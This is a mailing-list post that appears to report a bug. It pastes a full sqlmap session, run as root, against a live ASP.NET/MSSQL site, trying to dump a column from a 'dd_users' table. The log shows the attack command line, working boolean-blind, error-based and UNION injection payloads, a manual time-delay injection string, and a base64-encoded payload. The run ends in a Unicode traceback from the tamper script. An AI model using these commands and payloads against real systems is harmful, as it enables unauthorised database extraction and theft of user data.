root@anonymous:~/sqlmap-0905# ./sqlmap.py -r file2 -p 'major' --dbms=mssql
--level=5 --risk=3 --tamper=base64encode -D vls3db4 -T dbo.dd_users -C
'最后登录时间' --dump --hex -v 3
sqlmap/1.0-dev-4cf49bc - automatic SQL injection and database takeover
tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting at 00:51:25
[00:51:25] [INFO] parsing HTTP request from 'file2'
[00:51:25] [DEBUG] not a valid WebScarab log data
[00:51:25] [DEBUG] cleaning up configuration parameters
[00:51:25] [INFO] loading tamper script 'base64encode'
[00:51:25] [DEBUG] setting the HTTP timeout
[00:51:25] [DEBUG] setting the HTTP method to GET
[00:51:25] [DEBUG] creating HTTP requests opener object
[00:51:25] [DEBUG] forcing back-end DBMS to user defined value
[00:51:25] [WARNING] it appears that you have provided tainted parameter
values ('major=')waitfor delay'0:0:20'--') with most probably leftover
chars/statements from manual SQL injection test(s). Please, always use only
valid parameter values so sqlmap could be able to run properly
Are you sure you want to continue? [y/N] y
[00:51:26] [INFO] testing connection to the target URL
[00:51:49] [DEBUG] declared web page charset 'gb2312'
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: major
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: classid=&specialid=2&qstr=&major=-1315') OR (1954=1954) AND
('IRZo'='IRZo&station=&idxpage=2&ptopid=
Vector: OR ([INFERENCE])
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING
clause
Payload: classid=&specialid=2&qstr=&major=-3052') OR
5359=CONVERT(INT,(SELECT
CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN
(5359=5359) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113))) AND
('PLJO'='PLJO&station=&idxpage=2&ptopid=
Vector: OR [RANDNUM]=CONVERT(INT,(SELECT
'[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Type: UNION query
Title: Generic UNION query (random number) - 16 columns
Payload: classid=&specialid=2&qstr=&major=-7814') UNION ALL SELECT
CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+CHAR(106)+CHAR(86)+CHAR(99)+CHAR(114)+CHAR(70)+CHAR(111)+CHAR(78)+CHAR(116)+CHAR(69)+CHAR(87)+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113),1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654--
&station=&idxpage=2&ptopid=
Vector: UNION ALL SELECT
[QUERY],9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026--
---
[00:51:49] [WARNING] changes made by tampering scripts are not included in
shown payload content(s)
[00:51:49] [INFO] testing Microsoft SQL Server
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [INFO] confirming Microsoft SQL Server
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [PAYLOAD]
LTQ3MjInKSBVTklPTiBBTEwgU0VMRUNUIENIQVIoMTEzKStDSEFSKDEyMikrQ0hBUigxMTgpK0NIQVIoMTIxKStDSEFSKDExMykrKENBU0UgV0hFTiAoQ09OQ0FUKE5VTEwsTlVMTCk9Q09OQ0FUKE5VTEwsTlVMTCkpIFRIRU4gQ0hBUig0OSkgRUxTRSBDSEFSKDQ4KSBFTkQpK0NIQVIoMTEzKStDSEFSKDEwMSkrQ0hBUig5OSkrQ0hBUig5OSkrQ0hBUigxMTMpLDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LS0g
[00:51:50] [DEBUG] performed 1 queries in 0.57 seconds
[00:51:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[00:51:50] [INFO] fetching columns '最后登录时间' for table 'dd_users' in
database 'vls3db4'
[00:51:50] [INFO] the SQL query used returns 1 entries
[00:51:50] [DEBUG] performed 0 queries in 0.02 seconds
[00:51:50] [INFO] fetching entries of column(s) '[最后登录时间]' for table
'dd_users' in database 'vls3db4'
[00:51:50] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:50] [INFO] fetching number of distinct values for column '[最后登录时间]'
Traceback (most recent call last):
  File "/root/sqlmap-0905/thirdparty/ansistrm/ansistrm.py", line 51, in emit
    message = stdoutencode(self.format(record))
  File "/root/sqlmap-0905/lib/core/convert.py", line 160, in stdoutencode
    retVal = data.encode(UNICODE_ENCODING)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe6 in position 688: ordinal not in range(128)
Logged from file sqlmap.py, line 125
Traceback (most recent call last):
  File "./sqlmap.py", line 95, in main
    start()
  File "/root/sqlmap-0905/lib/controller/controller.py", line 582, in start
    action()
  File "/root/sqlmap-0905/lib/controller/action.py", line 127, in action
    conf.dbmsHandler.dumpTable()
  File "/root/sqlmap-0905/plugins/generic/entries.py", line 155, in dumpTable
    retVal = pivotDumpTable(table, colList, blind=False)
  File "/root/sqlmap-0905/lib/utils/pivotdumptable.py", line 86, in pivotDumpTable
    value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
  File "/root/sqlmap-0905/lib/request/inject.py", line 360, in getValue
    value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
  File "/root/sqlmap-0905/lib/request/inject.py", line 312, in _goUnion
    output = unionUse(expression, unpack=unpack, dump=dump)
  File "/root/sqlmap-0905/lib/techniques/union/use.py", line 334, in unionUse
    output = _oneShotUnionUse(expression, unpack)
  File "/root/sqlmap-0905/lib/techniques/union/use.py", line 73, in _oneShotUnionUse
    page, headers = Request.queryPage(payload, content=True, raise404=False)
  File "/root/sqlmap-0905/lib/request/connect.py", line 641, in queryPage
    payload = function(payload=payload, headers=auxHeaders)
  File "/root/sqlmap-0905/tamper/base64encode.py", line 25, in tamper
    return base64.b64encode(payload) if payload else payload
  File "/usr/lib/python2.7/base64.py", line 53, in b64encode
    encoded = binascii.b2a_base64(s)[:-1]
UnicodeEncodeError: 'ascii' codec can't encode characters in position 147-152: ordinal not in range(128)
[*] shutting down at 00:51:50
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users